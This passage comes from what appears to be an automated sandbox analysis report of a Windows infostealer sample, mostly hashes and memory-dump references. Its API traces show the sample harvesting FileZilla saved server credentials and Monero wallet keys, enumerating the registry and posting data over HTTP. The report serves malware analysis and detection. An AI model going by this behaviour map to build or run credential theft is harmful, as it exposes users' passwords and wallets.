                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >)w{
                                  • API String ID: 0-2709875300
                                  • Opcode ID: 41457d7b6ceb30dc5b9ef363106edd3b2bd39be8664a5b370752bc7596d54a27
                                  • Instruction ID: 41c5bc46b6b6eebed870b6e1188e7915b226e4f7b9bd9cf701a1a0a847e9ed09
                                  • Opcode Fuzzy Hash: 41457d7b6ceb30dc5b9ef363106edd3b2bd39be8664a5b370752bc7596d54a27
                                  • Instruction Fuzzy Hash: E47127F3E082109FF7046E28DC5977AB7D6EB94320F1B453DEAC997784E939580482C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: P{
                                  • API String ID: 0-277153622
                                  • Opcode ID: 71d2fa1c7cc079b532a2336bfa6d31c8f4764662ed5955f275fa9ab9a4ce4966
                                  • Instruction ID: 4bdb0ae63c397590f842715dd69440aa241849895920ab4a51c22754d51e4e93
                                  • Opcode Fuzzy Hash: 71d2fa1c7cc079b532a2336bfa6d31c8f4764662ed5955f275fa9ab9a4ce4966
                                  • Instruction Fuzzy Hash: 09513BF3E081145FE3056939DD597BA7ADADBA4330F2F463DE988D3784F93958054282
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: u:
                                  • API String ID: 0-2697468514
                                  • Opcode ID: c4ab98798dd85a89186df02ee6ae38baf90341f122a7179dbe031901a2751410
                                  • Instruction ID: 27512c137548df98037cc3ec7d18d817480b93a193418fe770b4aae49df77820
                                  • Opcode Fuzzy Hash: c4ab98798dd85a89186df02ee6ae38baf90341f122a7179dbe031901a2751410
                                  • Instruction Fuzzy Hash: 215147B390C2049BE708BA2D9C655BEB7E5EB94320F1A053DE9CA83740EA315811C783
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: yWso
                                  • API String ID: 0-2275368643
                                  • Opcode ID: cceacbc661aeb05de6574cee43f44814c15b68df4a5f1dc99d639701ce804d53
                                  • Instruction ID: 53751a3bf329c515d8182f86230068e957975dc79d716f08645ecad7ae003d12
                                  • Opcode Fuzzy Hash: cceacbc661aeb05de6574cee43f44814c15b68df4a5f1dc99d639701ce804d53
                                  • Instruction Fuzzy Hash: DD31E7F3A082009FF305AD29DC857BBBBD6DBD4320F1AC53DD694C7784E93999018696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e3d58e8b2003363e4f5ed7a1c3918a681d4301846ea30d60dd4b2c2a6c929ad
                                  • Instruction ID: ca840b780b4fee2faed481c978d31fd5feb4ae4ae18c07779426115473fbab6d
                                  • Opcode Fuzzy Hash: 2e3d58e8b2003363e4f5ed7a1c3918a681d4301846ea30d60dd4b2c2a6c929ad
                                  • Instruction Fuzzy Hash: 708127F3A082109FE3445A2ADC8477AF7EAEFD4724F2B853EDA8497780D97548018692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bda07d0d3d50ecb13946e1e17a9abd60ff97dd357e7253f196b3b451ab5abdd
                                  • Instruction ID: fbb3372aee5998f92ca51aa7ec6fc9951d0e957df870cd7e097cb27b7d23587d
                                  • Opcode Fuzzy Hash: 7bda07d0d3d50ecb13946e1e17a9abd60ff97dd357e7253f196b3b451ab5abdd
                                  • Instruction Fuzzy Hash: C1513CF3A182045FE3509E7CDDC4766BADAEB84320F27463DEA84D3784E57988008692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54b5eee4e8269cf97b5df799edd9d16f6ff46fb9e93a749ce145d1a7b5af94f4
                                  • Instruction ID: 1d6346677980a5895b270129054e060048d62b463cd4494adbafbafbcb4fdf9d
                                  • Opcode Fuzzy Hash: 54b5eee4e8269cf97b5df799edd9d16f6ff46fb9e93a749ce145d1a7b5af94f4
                                  • Instruction Fuzzy Hash: EC5116F3A0C6145BE3146A19EC45B6AB7E5EF94720F0B453DEAC893780EA3A59048787
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1da585e0b9489e89afd1ea01f1c741f3cc1db1805f298e129bb97b5d51efa512
                                  • Instruction ID: 5f7d5c8885282ee82d1860094da7d8f0a1fd8ff1f88cb61d134395fa862a7df3
                                  • Opcode Fuzzy Hash: 1da585e0b9489e89afd1ea01f1c741f3cc1db1805f298e129bb97b5d51efa512
                                  • Instruction Fuzzy Hash: 075125F3E086045FF3086A2AEC5577AB7D6EBD4710F1B843DDB8887748E93988064286
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb34d34bc1ffdc57d5903cede6cf8f176aa32424f1479af48845b049779019c2
                                  • Instruction ID: dfdb17bb5dba5bd9290ed4e9e763cfe5eb25ad407e4549da1f9c69dd9b9a1b94
                                  • Opcode Fuzzy Hash: bb34d34bc1ffdc57d5903cede6cf8f176aa32424f1479af48845b049779019c2
                                  • Instruction Fuzzy Hash: 54418BF3B083045BF304697DDCC576AB6CADB94720F2A423DEB54D7784EC79A8064286
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4edf23c824f94fc44316b2559adaa8a856e8f1f04c1f61349cb2ab73da261adb
                                  • Instruction ID: 955b095077fb9e48e345e21b385719e18224379d00b2a9ed8b46bff458baa91d
                                  • Opcode Fuzzy Hash: 4edf23c824f94fc44316b2559adaa8a856e8f1f04c1f61349cb2ab73da261adb
                                  • Instruction Fuzzy Hash: 3051D7F3A086009FE7146E29DCC576AFBE5EB94320F1B4A3DD6C483784EA7858058787
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00A90DBA,00A90DB7,00A90DB6,00A90DB3), ref: 00A80362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A80369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A80385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A803CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A803DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00A80419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A80463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A80562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00A80571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00A80580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A80593
                                  • lstrcat.KERNEL32(?,00A91678), ref: 00A805A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A805B5
                                  • lstrcat.KERNEL32(?,00A9167C), ref: 00A805C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00A805D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A805E6
                                  • lstrcat.KERNEL32(?,00A91688), ref: 00A805F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00A80604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A80617
                                  • lstrcat.KERNEL32(?,00A91698), ref: 00A80626
                                  • lstrcat.KERNEL32(?,00A9169C), ref: 00A80635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: e1bbe6df27f975989d9fb715d64b34e34c8829d2a9be4d26f0474d3df55ad1ec
                                  • Instruction ID: ef897b688c5cacba4758e5e8c072cf042b97fdde7e232a3b7dae89897df704ed
                                  • Opcode Fuzzy Hash: e1bbe6df27f975989d9fb715d64b34e34c8829d2a9be4d26f0474d3df55ad1ec
                                  • Instruction Fuzzy Hash: 55D1FE71E00108ABDB04FBF4DE96EEE7778BF64340F544519F102A6091EF79AA0ACB61
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A759F8
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A75A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A75B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0068F4C0,00000000,?,0068E438,00000000,?,00A91A1C), ref: 00A75E71
                                  • lstrlen.KERNEL32(00000000), ref: 00A75E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00A75E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A75E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00A75EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00A75ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A75EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00A75F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A75F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A75F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FBD
                                  • HttpOpenRequestA.WININET(00000000,0068F510,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A75BF8
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------$8h
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A7D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A7D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D208
                                  • lstrcat.KERNEL32(?,00A91478), ref: 00A7D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D22A
                                  • lstrcat.KERNEL32(?,00A9147C), ref: 00A7D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D24C
                                  • lstrcat.KERNEL32(?,00A91480), ref: 00A7D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D26E
                                  • lstrcat.KERNEL32(?,00A91484), ref: 00A7D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D290
                                  • lstrcat.KERNEL32(?,00A91488), ref: 00A7D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D2B2
                                  • lstrcat.KERNEL32(?,00A9148C), ref: 00A7D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D2D4
                                  • lstrcat.KERNEL32(?,00A91490), ref: 00A7D2E3
                                    • Part of subcall function 00A8A820: lstrlen.KERNEL32(00A74F05,?,?,00A74F05,00A90DDE), ref: 00A8A82B
                                    • Part of subcall function 00A8A820: lstrcpy.KERNEL32(00A90DDE,00000000), ref: 00A8A885
                                  • lstrlen.KERNEL32(?), ref: 00A7D32A
                                  • lstrlen.KERNEL32(?), ref: 00A7D339
                                    • Part of subcall function 00A8AA70: StrCmpCA.SHLWAPI(00688AD8,00A7A7A7,?,00A7A7A7,00688AD8), ref: 00A8AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A74915
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A7493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A74ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A90DDB,00000000,?,?,00000000,?,",00000000,?,0068F450), ref: 00A74DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A74E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A74E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A74E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74EC5
                                  • HttpOpenRequestA.WININET(00000000,0068F510,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A74B15
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74ECF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------$8h
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0068B848,00000000,00020019,00000000,00A905B6), ref: 00A883A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A88426
                                  • wsprintfA.USER32 ref: 00A88459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A8847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88499
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$(h$?$hh
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0068D1D0,00000000,?,00A9144C,00000000,?,?), ref: 00A7CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A7CA89
